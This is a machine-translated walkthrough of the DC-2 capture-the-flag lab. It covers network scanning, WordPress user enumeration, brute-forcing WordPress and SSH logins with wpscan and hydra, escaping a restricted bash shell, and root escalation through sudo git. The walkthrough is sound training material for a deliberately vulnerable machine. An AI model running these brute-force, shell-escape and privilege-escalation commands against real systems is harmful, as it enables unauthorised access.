DC-2 drone download link: https://pan.baidu.com/s/1g8nEs5K0MYBCfQr-bGla-w
Extraction code: 3xt9
View the kali host ip: ifconfig
View the MAC address of the target machine: Open the virtual machine settings, click the network adapter, select the nat
mode, and click Advanced.
Use nmap to scan the target ip: nmap -sP 192.168.159.0/24
Compare the mac address and find that the target target machine ip is 192.168.159.139
Use nmap to scan the port: nmap -A 192.168.159.139 -p 1-65535
find that port 80 is open, open the browser Enter the ip to access
the page and the page cannot be loaded. Add local DNS resolution:
add 192.168.159.139 DC-2 to vim /etc/hosts
Try to access again, successfully
found flag1, observe the flag narrative prompt use the cewl tool
to scan the website directory using the dirsearch tool, go to the directory of the dirsearch tool (the tool needs to be downloaded by itself): https://github.com/maurosoria/dirsearch
perl dirsearch.py -u 192.168.159.139 -e*
It is observed that the website is built for worldpress. Use wpscan to scan:
wpscan --url dc-2 -eu
found three users
Create a user dictionary: vim user, dic
Use the cewl tool to generate a dictionary: cewl dc-2>pwd.dic
wpscan blasts the user: wpscan --url dc-2 -U user.dic -P pwd.dic
According to the results of the dirsearch scan, it is found that there is /wp-admin
trying to access, and it is found that it is Login page
Use the jerry user and log in with the password we blasted out. Found
flag2
and he told us to find another way. We thought of using nmap to scan and scan out ssh port 7744.
Use hydra to blast ssh
hydra -L user.dic -P pwd.dic ssh: //192.168.159.139 -s 7744 -vV
blasting successfully
Try to log in with ssh: ssh [email protected] -p 7744
Login successfully
Check the current directory file: ls
found flag3 
Check flag3: cat flag3.txt
found that there is a -rbash command to limit the
bypass Over limit
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
successfully obtained flag3.txt
Switch jerry user: su jerry
enter password, switch successfully
Enter jerry's home directory, find flag4
View flag4: cat flag4.txt
View commands with root authority: sudo - l
found that the git command has root authority, and does not need to provide the root password
git authority: sudo git -p --help
forces to enter the interactive state, so that the page buffer cannot display all information: !/bin/bash
to find the final flag